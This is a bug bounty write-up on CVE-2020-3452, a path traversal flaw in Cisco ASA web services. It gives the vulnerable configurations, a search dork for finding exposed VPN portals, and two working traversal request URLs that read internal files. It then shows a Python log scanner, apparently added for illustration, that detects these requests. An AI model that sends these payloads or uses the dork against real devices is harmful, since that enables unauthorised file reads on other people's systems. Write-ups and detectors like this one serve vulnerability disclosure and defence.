$$ Bounties for Unauthenticated File Read in Cisco ASA CVE-2020-3452
Hey friends, back again with a write-up. I'm a bit lazy in writing bug bounty write-ups, but here I am!!
On July 22, 2020, Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services had a path traversal vulnerability where any user could read files on Cisco ASAs with the SSL VPN service. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user.
Below are the vulnerable configs:

AnyConnect IKEv2 Remote Access (with client services):
    crypto ikev2 enable <interface_name> client-services port <port #>
AnyConnect SSL VPN:
    webvpn
     enable <interface_name>
Clientless SSL VPN:
    webvpn
     enable <interface_name>
So how do you perform an attack on this vulnerability?
Let's take this as an example.
Vulnerable ASA:
https://1.1.1.1/+CSCOE+/logon.html?fcadbadd=1#form_title_text
Check out my dork on the Google Hacking Database; you can find similar logins with it.
Dork: https://www.exploit-db.com/ghdb/6441
Vulnerable endpoints:
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
If the endpoint is vulnerable, you will be able to view ASA files through Burp Suite; in a browser, the files will be downloaded.
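To spot these requests in your own logs, here is an added example (not from the original write-up or from Cisco): a Python check that flags requests to the two endpoints above whose parameters contain ".." or "+CSCOE+" after percent-decoding. The access-log shape, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# The two web-services handlers named in the write-up.
HANDLERS = {"/+CSCOT+/translation-table", "/+CSCOT+/oem-customization"}
# Decoded parameter values that climb directories or point into the +CSCOE+ tree.
SUSPICIOUS = re.compile(r"\.\.|\+CSCOE\+", re.IGNORECASE)
# Assumed log shape: '<client> ... "<METHOD> <uri> HTTP/x.y" ...'
REQUEST = re.compile(r'^(\S+).*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so values logged still encoded are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(uri):
    """Return names of query parameters that look like traversal, else []."""
    parts = urlsplit(uri)
    if fully_decode(parts.path) not in HANDLERS:
        return []
    hits = []
    # Split by hand: parse_qsl would turn '+' into a space and hide +CSCOE+.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if SUSPICIOUS.search(fully_decode(value)):
            hits.append(name)
    return hits

def scan(lines):
    """Yield (client, uri, params) for each log line worth triaging."""
    for line in lines:
        m = REQUEST.match(line)
        if m and (params := suspicious_params(m.group(2))):
            yield m.group(1), m.group(2), params

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [22/Jul/2020:10:00:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4096',
    '192.0.2.11 - - [22/Jul/2020:10:00:05 +0000] "GET /+CSCOT+/translation-table?textdomain=AnyConnect&type=manifest HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Jul/2020:10:01:12 +0000] "GET /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=%2e%2e&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 4096',
    '192.0.2.12 - - [22/Jul/2020:10:02:00 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, uri, params in scan(SAMPLE):
        print(client, params, uri)
```

A hit with a 200 response means the request should be triaged against the device's software version; the second and fourth sample lines show requests to the same portal that are not flagged.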
I found many top-level organizations having this vulnerability and earned a good amount of money because it is accepted as a P2.


Test your networks for these vulnerabilities or try your luck on bug bounties.
See you soon!!